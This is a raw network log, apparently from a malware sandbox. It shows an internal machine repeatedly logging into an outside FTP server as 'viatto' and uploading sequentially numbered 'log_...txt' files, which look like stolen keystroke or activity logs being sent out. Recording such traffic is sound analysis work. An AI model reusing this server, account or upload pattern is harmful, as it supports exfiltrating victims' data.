                                                                                                                                    Oct 10, 2022 06:03:02.170979023 CEST4988321192.168.2.3185.106.92.60MKD //138727-hardz/
                                                                                                                                    Oct 10, 2022 06:03:02.196511030 CEST2149883185.106.92.60192.168.2.3550 Directory already exists
                                                                                                                                    Oct 10, 2022 06:03:02.199292898 CEST4988321192.168.2.3185.106.92.60TYPE I
                                                                                                                                    Oct 10, 2022 06:03:02.223722935 CEST2149883185.106.92.60192.168.2.3200 Type set to I
                                                                                                                                    Oct 10, 2022 06:03:02.227638960 CEST4988321192.168.2.3185.106.92.60PASV
                                                                                                                                    Oct 10, 2022 06:03:02.252609015 CEST2149883185.106.92.60192.168.2.3227 Entering Passive Mode (185,106,92,60,252,104)
                                                                                                                                    Oct 10, 2022 06:03:02.281919956 CEST4988321192.168.2.3185.106.92.60STOR //138727-user/log_2022.10.10_07.31.txt
                                                                                                                                    Oct 10, 2022 06:03:02.307008028 CEST2149883185.106.92.60192.168.2.3150 Connection accepted
                                                                                                                                    Oct 10, 2022 06:03:02.334532976 CEST2149883185.106.92.60192.168.2.3226 Transfer OK
                                                                                                                                    Oct 10, 2022 06:03:02.550940037 CEST2149885185.106.92.60192.168.2.3220-FileZilla Server version 0.9.41 beta
                                                                                                                                    Oct 10, 2022 06:03:02.551019907 CEST2149885185.106.92.60192.168.2.3220-written by Tim Kosse (Tim.Kosse@gmx.de)
                                                                                                                                    Oct 10, 2022 06:03:02.551057100 CEST2149885185.106.92.60192.168.2.3220 Please visit http://sourceforge.net/projects/filezilla/
                                                                                                                                    Oct 10, 2022 06:03:02.551331997 CEST4988521192.168.2.3185.106.92.60USER viatto
                                                                                                                                    Oct 10, 2022 06:03:02.575356960 CEST2149885185.106.92.60192.168.2.3331 Password required for viatto
                                                                                                                                    Oct 10, 2022 06:03:02.583769083 CEST4988521192.168.2.3185.106.92.60PASS
                                                                                                                                    Oct 10, 2022 06:03:02.606813908 CEST2149885185.106.92.60192.168.2.3230 Logged on
                                                                                                                                    Oct 10, 2022 06:03:02.607155085 CEST4988521192.168.2.3185.106.92.60MKD /
                                                                                                                                    Oct 10, 2022 06:03:02.630232096 CEST2149885185.106.92.60192.168.2.3550 Directoryname not valid
                                                                                                                                    Oct 10, 2022 06:03:02.630711079 CEST4988521192.168.2.3185.106.92.60MKD //138727-hardz/
                                                                                                                                    Oct 10, 2022 06:03:02.656752110 CEST2149885185.106.92.60192.168.2.3550 Directory already exists
                                                                                                                                    Oct 10, 2022 06:03:02.657697916 CEST4988521192.168.2.3185.106.92.60TYPE I
                                                                                                                                    Oct 10, 2022 06:03:02.680520058 CEST2149885185.106.92.60192.168.2.3200 Type set to I
                                                                                                                                    Oct 10, 2022 06:03:02.682837009 CEST4988521192.168.2.3185.106.92.60PASV
                                                                                                                                    Oct 10, 2022 06:03:02.715755939 CEST2149885185.106.92.60192.168.2.3227 Entering Passive Mode (185,106,92,60,252,106)
                                                                                                                                    Oct 10, 2022 06:03:02.741849899 CEST4988521192.168.2.3185.106.92.60STOR //138727-user/log_2022.10.10_07.32.txt
                                                                                                                                    Oct 10, 2022 06:03:02.766041040 CEST2149885185.106.92.60192.168.2.3150 Connection accepted
                                                                                                                                    Oct 10, 2022 06:03:02.792387962 CEST2149885185.106.92.60192.168.2.3226 Transfer OK
                                                                                                                                    Oct 10, 2022 06:03:02.999628067 CEST2149887185.106.92.60192.168.2.3220-FileZilla Server version 0.9.41 beta
                                                                                                                                    Oct 10, 2022 06:03:02.999677896 CEST2149887185.106.92.60192.168.2.3220-written by Tim Kosse (Tim.Kosse@gmx.de)
                                                                                                                                    Oct 10, 2022 06:03:02.999710083 CEST2149887185.106.92.60192.168.2.3220 Please visit http://sourceforge.net/projects/filezilla/
                                                                                                                                    Oct 10, 2022 06:03:02.999969959 CEST4988721192.168.2.3185.106.92.60USER viatto
                                                                                                                                    Oct 10, 2022 06:03:03.024912119 CEST2149887185.106.92.60192.168.2.3331 Password required for viatto
                                                                                                                                    Oct 10, 2022 06:03:03.025171041 CEST4988721192.168.2.3185.106.92.60PASS
                                                                                                                                    Oct 10, 2022 06:03:03.049680948 CEST2149887185.106.92.60192.168.2.3230 Logged on
                                                                                                                                    Oct 10, 2022 06:03:03.049969912 CEST4988721192.168.2.3185.106.92.60MKD /
                                                                                                                                    Oct 10, 2022 06:03:03.074975014 CEST2149887185.106.92.60192.168.2.3550 Directoryname not valid
                                                                                                                                    Oct 10, 2022 06:03:03.075536013 CEST4988721192.168.2.3185.106.92.60MKD //138727-hardz/
                                                                                                                                    Oct 10, 2022 06:03:03.099287033 CEST2149887185.106.92.60192.168.2.3550 Directory already exists
                                                                                                                                    Oct 10, 2022 06:03:03.100481987 CEST4988721192.168.2.3185.106.92.60TYPE I
                                                                                                                                    Oct 10, 2022 06:03:03.124726057 CEST2149887185.106.92.60192.168.2.3200 Type set to I
                                                                                                                                    Oct 10, 2022 06:03:03.125729084 CEST4988721192.168.2.3185.106.92.60PASV
                                                                                                                                    Oct 10, 2022 06:03:03.150625944 CEST2149887185.106.92.60192.168.2.3227 Entering Passive Mode (185,106,92,60,252,107)
                                                                                                                                    Oct 10, 2022 06:03:03.174105883 CEST4988721192.168.2.3185.106.92.60STOR //138727-user/log_2022.10.10_07.33.txt
                                                                                                                                    Oct 10, 2022 06:03:03.199668884 CEST2149887185.106.92.60192.168.2.3150 Connection accepted
                                                                                                                                    Oct 10, 2022 06:03:03.225516081 CEST2149887185.106.92.60192.168.2.3226 Transfer OK
                                                                                                                                    Oct 10, 2022 06:03:03.415102005 CEST2149889185.106.92.60192.168.2.3220-FileZilla Server version 0.9.41 beta
                                                                                                                                    Oct 10, 2022 06:03:03.415154934 CEST2149889185.106.92.60192.168.2.3220-written by Tim Kosse (Tim.Kosse@gmx.de)
                                                                                                                                    Oct 10, 2022 06:03:03.415481091 CEST2149889185.106.92.60192.168.2.3220 Please visit http://sourceforge.net/projects/filezilla/
                                                                                                                                    Oct 10, 2022 06:03:03.416877031 CEST4988921192.168.2.3185.106.92.60USER viatto
                                                                                                                                    Oct 10, 2022 06:03:03.439661980 CEST2149889185.106.92.60192.168.2.3331 Password required for viatto
                                                                                                                                    Oct 10, 2022 06:03:03.443914890 CEST4988921192.168.2.3185.106.92.60PASS
                                                                                                                                    Oct 10, 2022 06:03:03.467597961 CEST2149889185.106.92.60192.168.2.3230 Logged on
                                                                                                                                    Oct 10, 2022 06:03:03.467868090 CEST4988921192.168.2.3185.106.92.60MKD /
                                                                                                                                    Oct 10, 2022 06:03:03.491348028 CEST2149889185.106.92.60192.168.2.3550 Directoryname not valid
                                                                                                                                    Oct 10, 2022 06:03:03.491936922 CEST4988921192.168.2.3185.106.92.60MKD //138727-hardz/
                                                                                                                                    Oct 10, 2022 06:03:03.515180111 CEST2149889185.106.92.60192.168.2.3550 Directory already exists
                                                                                                                                    Oct 10, 2022 06:03:03.518345118 CEST4988921192.168.2.3185.106.92.60TYPE I
                                                                                                                                    Oct 10, 2022 06:03:03.541385889 CEST2149889185.106.92.60192.168.2.3200 Type set to I
                                                                                                                                    Oct 10, 2022 06:03:03.559850931 CEST4988921192.168.2.3185.106.92.60PASV
                                                                                                                                    Oct 10, 2022 06:03:03.583477020 CEST2149889185.106.92.60192.168.2.3227 Entering Passive Mode (185,106,92,60,252,108)
                                                                                                                                    Oct 10, 2022 06:03:03.609476089 CEST4988921192.168.2.3185.106.92.60STOR //138727-user/log_2022.10.10_07.34.txt
                                                                                                                                    Oct 10, 2022 06:03:03.635154009 CEST2149889185.106.92.60192.168.2.3150 Connection accepted
                                                                                                                                    Oct 10, 2022 06:03:03.661232948 CEST2149889185.106.92.60192.168.2.3226 Transfer OK
                                                                                                                                    Oct 10, 2022 06:03:03.894102097 CEST2149891185.106.92.60192.168.2.3220-FileZilla Server version 0.9.41 beta
                                                                                                                                    Oct 10, 2022 06:03:03.894165039 CEST2149891185.106.92.60192.168.2.3220-written by Tim Kosse (Tim.Kosse@gmx.de)
                                                                                                                                    Oct 10, 2022 06:03:03.894210100 CEST2149891185.106.92.60192.168.2.3220 Please visit http://sourceforge.net/projects/filezilla/
                                                                                                                                    Oct 10, 2022 06:03:03.894462109 CEST4989121192.168.2.3185.106.92.60USER viatto
                                                                                                                                    Oct 10, 2022 06:03:03.926026106 CEST2149891185.106.92.60192.168.2.3331 Password required for viatto
                                                                                                                                    Oct 10, 2022 06:03:03.926297903 CEST4989121192.168.2.3185.106.92.60PASS
                                                                                                                                    Oct 10, 2022 06:03:03.953907967 CEST2149891185.106.92.60192.168.2.3230 Logged on
                                                                                                                                    Oct 10, 2022 06:03:03.954370022 CEST4989121192.168.2.3185.106.92.60MKD /
                                                                                                                                    Oct 10, 2022 06:03:03.980804920 CEST2149891185.106.92.60192.168.2.3550 Directoryname not valid
                                                                                                                                    Oct 10, 2022 06:03:03.981976032 CEST4989121192.168.2.3185.106.92.60MKD //138727-hardz/
                                                                                                                                    Oct 10, 2022 06:03:04.008634090 CEST2149891185.106.92.60192.168.2.3550 Directory already exists
                                                                                                                                    Oct 10, 2022 06:03:04.009367943 CEST4989121192.168.2.3185.106.92.60TYPE I
                                                                                                                                    Oct 10, 2022 06:03:04.035708904 CEST2149891185.106.92.60192.168.2.3200 Type set to I
                                                                                                                                    Oct 10, 2022 06:03:04.038362026 CEST4989121192.168.2.3185.106.92.60PASV
                                                                                                                                    Oct 10, 2022 06:03:04.066013098 CEST2149891185.106.92.60192.168.2.3227 Entering Passive Mode (185,106,92,60,252,109)
                                                                                                                                    Oct 10, 2022 06:03:04.113635063 CEST4989121192.168.2.3185.106.92.60STOR //138727-user/log_2022.10.10_07.35.txt
                                                                                                                                    Oct 10, 2022 06:03:04.141748905 CEST2149891185.106.92.60192.168.2.3150 Connection accepted
                                                                                                                                    Oct 10, 2022 06:03:04.168667078 CEST2149891185.106.92.60192.168.2.3226 Transfer OK
                                                                                                                                    Oct 10, 2022 06:03:04.376979113 CEST2149893185.106.92.60192.168.2.3220-FileZilla Server version 0.9.41 beta
                                                                                                                                    Oct 10, 2022 06:03:04.377027988 CEST2149893185.106.92.60192.168.2.3220-written by Tim Kosse (Tim.Kosse@gmx.de)
                                                                                                                                    Oct 10, 2022 06:03:04.377095938 CEST2149893185.106.92.60192.168.2.3220 Please visit http://sourceforge.net/projects/filezilla/
                                                                                                                                    Oct 10, 2022 06:03:04.377509117 CEST4989321192.168.2.3185.106.92.60USER viatto
                                                                                                                                    Oct 10, 2022 06:03:04.401870966 CEST2149893185.106.92.60192.168.2.3331 Password required for viatto
                                                                                                                                    Oct 10, 2022 06:03:04.402443886 CEST4989321192.168.2.3185.106.92.60PASS
                                                                                                                                    Oct 10, 2022 06:03:04.427239895 CEST2149893185.106.92.60192.168.2.3230 Logged on
                                                                                                                                    Oct 10, 2022 06:03:04.431282997 CEST4989321192.168.2.3185.106.92.60MKD /
                                                                                                                                    Oct 10, 2022 06:03:04.455929041 CEST2149893185.106.92.60192.168.2.3550 Directoryname not valid
                                                                                                                                    Oct 10, 2022 06:03:04.456213951 CEST4989321192.168.2.3185.106.92.60MKD //138727-hardz/
                                                                                                                                    Oct 10, 2022 06:03:04.480648994 CEST2149893185.106.92.60192.168.2.3550 Directory already exists
                                                                                                                                    Oct 10, 2022 06:03:04.487337112 CEST4989321192.168.2.3185.106.92.60TYPE I
                                                                                                                                    Oct 10, 2022 06:03:04.512061119 CEST2149893185.106.92.60192.168.2.3200 Type set to I
                                                                                                                                    Oct 10, 2022 06:03:04.516069889 CEST4989321192.168.2.3185.106.92.60PASV
                                                                                                                                    Oct 10, 2022 06:03:04.541347980 CEST2149893185.106.92.60192.168.2.3227 Entering Passive Mode (185,106,92,60,252,110)
                                                                                                                                    Oct 10, 2022 06:03:04.566164970 CEST4989321192.168.2.3185.106.92.60STOR //138727-user/log_2022.10.10_07.36.txt
                                                                                                                                    Oct 10, 2022 06:03:04.591389894 CEST2149893185.106.92.60192.168.2.3150 Connection accepted
                                                                                                                                    Oct 10, 2022 06:03:04.618084908 CEST2149893185.106.92.60192.168.2.3226 Transfer OK
                                                                                                                                    Oct 10, 2022 06:03:04.813783884 CEST2149895185.106.92.60192.168.2.3220-FileZilla Server version 0.9.41 beta
                                                                                                                                    Oct 10, 2022 06:03:04.813836098 CEST2149895185.106.92.60192.168.2.3220-written by Tim Kosse (Tim.Kosse@gmx.de)
                                                                                                                                    Oct 10, 2022 06:03:04.814203024 CEST2149895185.106.92.60192.168.2.3220 Please visit http://sourceforge.net/projects/filezilla/
                                                                                                                                    Oct 10, 2022 06:03:04.814372063 CEST4989521192.168.2.3185.106.92.60USER viatto
                                                                                                                                    Oct 10, 2022 06:03:04.837006092 CEST2149895185.106.92.60192.168.2.3331 Password required for viatto
                                                                                                                                    Oct 10, 2022 06:03:04.837531090 CEST4989521192.168.2.3185.106.92.60PASS
                                                                                                                                    Oct 10, 2022 06:03:04.860538006 CEST2149895185.106.92.60192.168.2.3230 Logged on
                                                                                                                                    Oct 10, 2022 06:03:04.861041069 CEST4989521192.168.2.3185.106.92.60MKD /
                                                                                                                                    Oct 10, 2022 06:03:04.883944035 CEST2149895185.106.92.60192.168.2.3550 Directoryname not valid
                                                                                                                                    Oct 10, 2022 06:03:04.884224892 CEST4989521192.168.2.3185.106.92.60MKD //138727-hardz/
                                                                                                                                    Oct 10, 2022 06:03:04.907465935 CEST2149895185.106.92.60192.168.2.3550 Directory already exists
                                                                                                                                    Oct 10, 2022 06:03:04.907942057 CEST4989521192.168.2.3185.106.92.60TYPE I
                                                                                                                                    Oct 10, 2022 06:03:04.931016922 CEST2149895185.106.92.60192.168.2.3200 Type set to I
                                                                                                                                    Oct 10, 2022 06:03:04.932017088 CEST4989521192.168.2.3185.106.92.60PASV
                                                                                                                                    Oct 10, 2022 06:03:04.955410004 CEST2149895185.106.92.60192.168.2.3227 Entering Passive Mode (185,106,92,60,252,112)
                                                                                                                                    Oct 10, 2022 06:03:04.979186058 CEST4989521192.168.2.3185.106.92.60STOR //138727-user/log_2022.10.10_07.37.txt
                                                                                                                                    Oct 10, 2022 06:03:05.003382921 CEST2149895185.106.92.60192.168.2.3150 Connection accepted
                                                                                                                                    Oct 10, 2022 06:03:05.027169943 CEST2149895185.106.92.60192.168.2.3226 Transfer OK
                                                                                                                                    Oct 10, 2022 06:03:05.301058054 CEST2149897185.106.92.60192.168.2.3220-FileZilla Server version 0.9.41 beta
                                                                                                                                    Oct 10, 2022 06:03:05.301120996 CEST2149897185.106.92.60192.168.2.3220-written by Tim Kosse (Tim.Kosse@gmx.de)
                                                                                                                                    Oct 10, 2022 06:03:05.301143885 CEST2149897185.106.92.60192.168.2.3220 Please visit http://sourceforge.net/projects/filezilla/
                                                                                                                                    Oct 10, 2022 06:03:05.407452106 CEST4989721192.168.2.3185.106.92.60USER viatto
                                                                                                                                    Oct 10, 2022 06:03:05.432244062 CEST2149897185.106.92.60192.168.2.3331 Password required for viatto
                                                                                                                                    Oct 10, 2022 06:03:05.433185101 CEST4989721192.168.2.3185.106.92.60PASS
                                                                                                                                    Oct 10, 2022 06:03:05.457387924 CEST2149897185.106.92.60192.168.2.3230 Logged on
                                                                                                                                    Oct 10, 2022 06:03:05.478271008 CEST4989721192.168.2.3185.106.92.60MKD /
                                                                                                                                    Oct 10, 2022 06:03:05.503309011 CEST2149897185.106.92.60192.168.2.3550 Directoryname not valid
                                                                                                                                    Oct 10, 2022 06:03:05.503593922 CEST4989721192.168.2.3185.106.92.60MKD //138727-hardz/
                                                                                                                                    Oct 10, 2022 06:03:05.528117895 CEST2149897185.106.92.60192.168.2.3550 Directory already exists
                                                                                                                                    Oct 10, 2022 06:03:05.554768085 CEST4989721192.168.2.3185.106.92.60TYPE I
                                                                                                                                    Oct 10, 2022 06:03:05.579680920 CEST2149897185.106.92.60192.168.2.3200 Type set to I
                                                                                                                                    Oct 10, 2022 06:03:05.580718040 CEST4989721192.168.2.3185.106.92.60PASV
                                                                                                                                    Oct 10, 2022 06:03:05.605925083 CEST2149897185.106.92.60192.168.2.3227 Entering Passive Mode (185,106,92,60,252,113)
                                                                                                                                    Oct 10, 2022 06:03:05.670401096 CEST4989721192.168.2.3185.106.92.60STOR //138727-user/log_2022.10.10_07.38.txt
                                                                                                                                    Oct 10, 2022 06:03:05.748550892 CEST2149897185.106.92.60192.168.2.3150 Connection accepted
                                                                                                                                    Oct 10, 2022 06:03:05.811934948 CEST2149897185.106.92.60192.168.2.3226 Transfer OK
                                                                                                                                    Oct 10, 2022 06:03:06.007417917 CEST2149899185.106.92.60192.168.2.3220-FileZilla Server version 0.9.41 beta
                                                                                                                                    Oct 10, 2022 06:03:06.007508039 CEST2149899185.106.92.60192.168.2.3220-written by Tim Kosse (Tim.Kosse@gmx.de)
                                                                                                                                    Oct 10, 2022 06:03:06.007570028 CEST2149899185.106.92.60192.168.2.3220 Please visit http://sourceforge.net/projects/filezilla/
                                                                                                                                    Oct 10, 2022 06:03:06.007843018 CEST4989921192.168.2.3185.106.92.60USER viatto
                                                                                                                                    Oct 10, 2022 06:03:06.034838915 CEST2149899185.106.92.60192.168.2.3331 Password required for viatto
                                                                                                                                    Oct 10, 2022 06:03:06.035093069 CEST4989921192.168.2.3185.106.92.60PASS
                                                                                                                                    Oct 10, 2022 06:03:06.061382055 CEST2149899185.106.92.60192.168.2.3230 Logged on
                                                                                                                                    Oct 10, 2022 06:03:06.099591970 CEST4989921192.168.2.3185.106.92.60MKD /
                                                                                                                                    Oct 10, 2022 06:03:06.128659964 CEST2149899185.106.92.60192.168.2.3550 Directoryname not valid
                                                                                                                                    Oct 10, 2022 06:03:06.129009008 CEST4989921192.168.2.3185.106.92.60MKD //138727-hardz/
                                                                                                                                    Oct 10, 2022 06:03:06.167710066 CEST2149899185.106.92.60192.168.2.3550 Directory already exists
                                                                                                                                    Oct 10, 2022 06:03:06.710732937 CEST4989921192.168.2.3185.106.92.60TYPE I
                                                                                                                                    Oct 10, 2022 06:03:06.736407042 CEST2149899185.106.92.60192.168.2.3200 Type set to I
                                                                                                                                    Oct 10, 2022 06:03:06.740475893 CEST4989921192.168.2.3185.106.92.60PASV
                                                                                                                                    Oct 10, 2022 06:03:06.767494917 CEST2149899185.106.92.60192.168.2.3227 Entering Passive Mode (185,106,92,60,252,115)
                                                                                                                                    Oct 10, 2022 06:03:06.835763931 CEST4989921192.168.2.3185.106.92.60STOR //138727-user/log_2022.10.10_07.39.txt
                                                                                                                                    Oct 10, 2022 06:03:06.860941887 CEST2149899185.106.92.60192.168.2.3150 Connection accepted
                                                                                                                                    Oct 10, 2022 06:03:06.887872934 CEST2149899185.106.92.60192.168.2.3226 Transfer OK
                                                                                                                                    Oct 10, 2022 06:03:07.190545082 CEST2149901185.106.92.60192.168.2.3220-FileZilla Server version 0.9.41 beta
                                                                                                                                    Oct 10, 2022 06:03:07.190578938 CEST2149901185.106.92.60192.168.2.3220-written by Tim Kosse (Tim.Kosse@gmx.de)
                                                                                                                                    Oct 10, 2022 06:03:07.190592051 CEST2149901185.106.92.60192.168.2.3220 Please visit http://sourceforge.net/projects/filezilla/
                                                                                                                                    Oct 10, 2022 06:03:07.823195934 CEST4990121192.168.2.3185.106.92.60USER viatto
                                                                                                                                    Oct 10, 2022 06:03:07.846781969 CEST2149901185.106.92.60192.168.2.3331 Password required for viatto
                                                                                                                                    Oct 10, 2022 06:03:07.851780891 CEST4990121192.168.2.3185.106.92.60PASS
                                                                                                                                    Oct 10, 2022 06:03:07.874836922 CEST2149901185.106.92.60192.168.2.3230 Logged on
                                                                                                                                    Oct 10, 2022 06:03:07.911576986 CEST4990121192.168.2.3185.106.92.60MKD /
                                                                                                                                    Oct 10, 2022 06:03:07.935074091 CEST2149901185.106.92.60192.168.2.3550 Directoryname not valid
                                                                                                                                    Oct 10, 2022 06:03:07.945804119 CEST4990121192.168.2.3185.106.92.60MKD //138727-hardz/
                                                                                                                                    Oct 10, 2022 06:03:07.969727039 CEST2149901185.106.92.60192.168.2.3550 Directory already exists
                                                                                                                                    Oct 10, 2022 06:03:07.983813047 CEST4990121192.168.2.3185.106.92.60TYPE I
                                                                                                                                    Oct 10, 2022 06:03:08.006859064 CEST2149901185.106.92.60192.168.2.3200 Type set to I
                                                                                                                                    Oct 10, 2022 06:03:08.008120060 CEST4990121192.168.2.3185.106.92.60PASV
                                                                                                                                    Oct 10, 2022 06:03:08.031495094 CEST2149901185.106.92.60192.168.2.3227 Entering Passive Mode (185,106,92,60,252,116)
                                                                                                                                    Oct 10, 2022 06:03:08.084952116 CEST4990121192.168.2.3185.106.92.60STOR //138727-user/log_2022.10.10_07.40.txt
                                                                                                                                    Oct 10, 2022 06:03:08.108634949 CEST2149901185.106.92.60192.168.2.3150 Connection accepted
                                                                                                                                    Oct 10, 2022 06:03:08.134666920 CEST2149901185.106.92.60192.168.2.3226 Transfer OK
                                                                                                                                    Oct 10, 2022 06:03:08.375755072 CEST2149903185.106.92.60192.168.2.3220-FileZilla Server version 0.9.41 beta
                                                                                                                                    Oct 10, 2022 06:03:08.375777006 CEST2149903185.106.92.60192.168.2.3220-written by Tim Kosse (Tim.Kosse@gmx.de)
                                                                                                                                    Oct 10, 2022 06:03:08.375788927 CEST2149903185.106.92.60192.168.2.3220 Please visit http://sourceforge.net/projects/filezilla/
                                                                                                                                    Oct 10, 2022 06:03:08.377460003 CEST4990321192.168.2.3185.106.92.60USER viatto
                                                                                                                                    Oct 10, 2022 06:03:08.401446104 CEST2149903185.106.92.60192.168.2.3331 Password required for viatto
                                                                                                                                    Oct 10, 2022 06:03:08.401823997 CEST4990321192.168.2.3185.106.92.60PASS
                                                                                                                                    Oct 10, 2022 06:03:08.426219940 CEST2149903185.106.92.60192.168.2.3230 Logged on
                                                                                                                                    Oct 10, 2022 06:03:08.426731110 CEST4990321192.168.2.3185.106.92.60MKD /
                                                                                                                                    Oct 10, 2022 06:03:08.451396942 CEST2149903185.106.92.60192.168.2.3550 Directoryname not valid
                                                                                                                                    Oct 10, 2022 06:03:08.451653004 CEST4990321192.168.2.3185.106.92.60MKD //138727-hardz/
                                                                                                                                    Oct 10, 2022 06:03:08.476433992 CEST2149903185.106.92.60192.168.2.3550 Directory already exists
                                                                                                                                    Oct 10, 2022 06:03:08.477454901 CEST4990321192.168.2.3185.106.92.60TYPE I
                                                                                                                                    Oct 10, 2022 06:03:08.502537012 CEST2149903185.106.92.60192.168.2.3200 Type set to I
                                                                                                                                    Oct 10, 2022 06:03:08.503546953 CEST4990321192.168.2.3185.106.92.60PASV
                                                                                                                                    Oct 10, 2022 06:03:08.528577089 CEST2149903185.106.92.60192.168.2.3227 Entering Passive Mode (185,106,92,60,252,117)
                                                                                                                                    Oct 10, 2022 06:03:08.561155081 CEST4990321192.168.2.3185.106.92.60STOR //138727-user/log_2022.10.10_07.41.txt
                                                                                                                                    Oct 10, 2022 06:03:08.622764111 CEST2149903185.106.92.60192.168.2.3150 Connection accepted
                                                                                                                                    Oct 10, 2022 06:03:08.647306919 CEST2149903185.106.92.60192.168.2.3226 Transfer OK
                                                                                                                                    Oct 10, 2022 06:03:08.847857952 CEST2149905185.106.92.60192.168.2.3220-FileZilla Server version 0.9.41 beta
                                                                                                                                    Oct 10, 2022 06:03:08.847877026 CEST2149905185.106.92.60192.168.2.3220-written by Tim Kosse (Tim.Kosse@gmx.de)
                                                                                                                                    Oct 10, 2022 06:03:08.847887993 CEST2149905185.106.92.60192.168.2.3220 Please visit http://sourceforge.net/projects/filezilla/
                                                                                                                                    Oct 10, 2022 06:03:08.857614040 CEST4990521192.168.2.3185.106.92.60USER viatto
                                                                                                                                    Oct 10, 2022 06:03:08.883852959 CEST2149905185.106.92.60192.168.2.3331 Password required for viatto
                                                                                                                                    Oct 10, 2022 06:03:08.887481928 CEST4990521192.168.2.3185.106.92.60PASS
                                                                                                                                    Oct 10, 2022 06:03:08.913006067 CEST2149905185.106.92.60192.168.2.3230 Logged on
                                                                                                                                    Oct 10, 2022 06:03:08.915435076 CEST4990521192.168.2.3185.106.92.60MKD /
                                                                                                                                    Oct 10, 2022 06:03:08.940618992 CEST2149905185.106.92.60192.168.2.3550 Directoryname not valid
                                                                                                                                    Oct 10, 2022 06:03:08.943497896 CEST4990521192.168.2.3185.106.92.60MKD //138727-hardz/
                                                                                                                                    Oct 10, 2022 06:03:08.969016075 CEST2149905185.106.92.60192.168.2.3550 Directory already exists
                                                                                                                                    Oct 10, 2022 06:03:08.969559908 CEST4990521192.168.2.3185.106.92.60TYPE I
                                                                                                                                    Oct 10, 2022 06:03:08.994038105 CEST2149905185.106.92.60192.168.2.3200 Type set to I
                                                                                                                                    Oct 10, 2022 06:03:08.996270895 CEST4990521192.168.2.3185.106.92.60PASV
                                                                                                                                    Oct 10, 2022 06:03:09.022347927 CEST2149905185.106.92.60192.168.2.3227 Entering Passive Mode (185,106,92,60,252,118)
                                                                                                                                    Oct 10, 2022 06:03:09.047019958 CEST4990521192.168.2.3185.106.92.60STOR //138727-user/log_2022.10.10_07.42.txt
                                                                                                                                    Oct 10, 2022 06:03:09.072267056 CEST2149905185.106.92.60192.168.2.3150 Connection accepted
                                                                                                                                    Oct 10, 2022 06:03:09.101145029 CEST2149905185.106.92.60192.168.2.3226 Transfer OK
                                                                                                                                    Oct 10, 2022 06:03:09.313208103 CEST2149907185.106.92.60192.168.2.3220-FileZilla Server version 0.9.41 beta
                                                                                                                                    Oct 10, 2022 06:03:09.313231945 CEST2149907185.106.92.60192.168.2.3220-written by Tim Kosse (Tim.Kosse@gmx.de)
                                                                                                                                    Oct 10, 2022 06:03:09.313441992 CEST2149907185.106.92.60192.168.2.3220 Please visit http://sourceforge.net/projects/filezilla/
                                                                                                                                    Oct 10, 2022 06:03:09.313622952 CEST4990721192.168.2.3185.106.92.60USER viatto
                                                                                                                                    Oct 10, 2022 06:03:09.337136030 CEST2149907185.106.92.60192.168.2.3331 Password required for viatto
                                                                                                                                    Oct 10, 2022 06:03:09.337618113 CEST4990721192.168.2.3185.106.92.60PASS
                                                                                                                                    Oct 10, 2022 06:03:09.360857010 CEST2149907185.106.92.60192.168.2.3230 Logged on
                                                                                                                                    Oct 10, 2022 06:03:09.361752987 CEST4990721192.168.2.3185.106.92.60MKD /
                                                                                                                                    Oct 10, 2022 06:03:09.385534048 CEST2149907185.106.92.60192.168.2.3550 Directoryname not valid
                                                                                                                                    Oct 10, 2022 06:03:09.396229029 CEST4990721192.168.2.3185.106.92.60MKD //138727-hardz/
                                                                                                                                    Oct 10, 2022 06:03:09.419739008 CEST2149907185.106.92.60192.168.2.3550 Directory already exists
                                                                                                                                    Oct 10, 2022 06:03:09.421785116 CEST4990721192.168.2.3185.106.92.60TYPE I
                                                                                                                                    Oct 10, 2022 06:03:09.444751978 CEST2149907185.106.92.60192.168.2.3200 Type set to I
                                                                                                                                    Oct 10, 2022 06:03:09.447005033 CEST4990721192.168.2.3185.106.92.60PASV
                                                                                                                                    Oct 10, 2022 06:03:09.470237017 CEST2149907185.106.92.60192.168.2.3227 Entering Passive Mode (185,106,92,60,252,119)
                                                                                                                                    Oct 10, 2022 06:03:09.506156921 CEST4990721192.168.2.3185.106.92.60STOR //138727-user/log_2022.10.10_07.43.txt
                                                                                                                                    Oct 10, 2022 06:03:09.529721975 CEST2149907185.106.92.60192.168.2.3150 Connection accepted
                                                                                                                                    Oct 10, 2022 06:03:09.564240932 CEST2149907185.106.92.60192.168.2.3226 Transfer OK
                                                                                                                                    Oct 10, 2022 06:03:09.761024952 CEST2149909185.106.92.60192.168.2.3220-FileZilla Server version 0.9.41 beta
                                                                                                                                    Oct 10, 2022 06:03:09.761955976 CEST2149909185.106.92.60192.168.2.3220-written by Tim Kosse (Tim.Kosse@gmx.de)
                                                                                                                                    Oct 10, 2022 06:03:09.762592077 CEST2149909185.106.92.60192.168.2.3220 Please visit http://sourceforge.net/projects/filezilla/
                                                                                                                                    Oct 10, 2022 06:03:09.763518095 CEST4990921192.168.2.3185.106.92.60USER viatto
                                                                                                                                    Oct 10, 2022 06:03:09.789005995 CEST2149909185.106.92.60192.168.2.3331 Password required for viatto
                                                                                                                                    Oct 10, 2022 06:03:09.789453030 CEST4990921192.168.2.3185.106.92.60PASS
                                                                                                                                    Oct 10, 2022 06:03:09.814951897 CEST2149909185.106.92.60192.168.2.3230 Logged on
                                                                                                                                    Oct 10, 2022 06:03:09.815520048 CEST4990921192.168.2.3185.106.92.60MKD /
                                                                                                                                    Oct 10, 2022 06:03:09.842941046 CEST2149909185.106.92.60192.168.2.3550 Directoryname not valid
                                                                                                                                    Oct 10, 2022 06:03:09.846822023 CEST4990921192.168.2.3185.106.92.60MKD //138727-hardz/
                                                                                                                                    Oct 10, 2022 06:03:09.873923063 CEST2149909185.106.92.60192.168.2.3550 Directory already exists
                                                                                                                                    Oct 10, 2022 06:03:09.874479055 CEST4990921192.168.2.3185.106.92.60TYPE I
                                                                                                                                    Oct 10, 2022 06:03:09.900857925 CEST2149909185.106.92.60192.168.2.3200 Type set to I
                                                                                                                                    Oct 10, 2022 06:03:09.901938915 CEST4990921192.168.2.3185.106.92.60PASV
                                                                                                                                    Oct 10, 2022 06:03:09.930223942 CEST2149909185.106.92.60192.168.2.3227 Entering Passive Mode (185,106,92,60,252,121)
                                                                                                                                    Oct 10, 2022 06:03:09.954366922 CEST4990921192.168.2.3185.106.92.60STOR //138727-user/log_2022.10.10_07.44.txt
                                                                                                                                    Oct 10, 2022 06:03:09.985192060 CEST2149909185.106.92.60192.168.2.3150 Connection accepted
                                                                                                                                    Oct 10, 2022 06:03:10.010093927 CEST2149909185.106.92.60192.168.2.3226 Transfer OK
                                                                                                                                    Oct 10, 2022 06:03:10.198632002 CEST2149911185.106.92.60192.168.2.3220-FileZilla Server version 0.9.41 beta
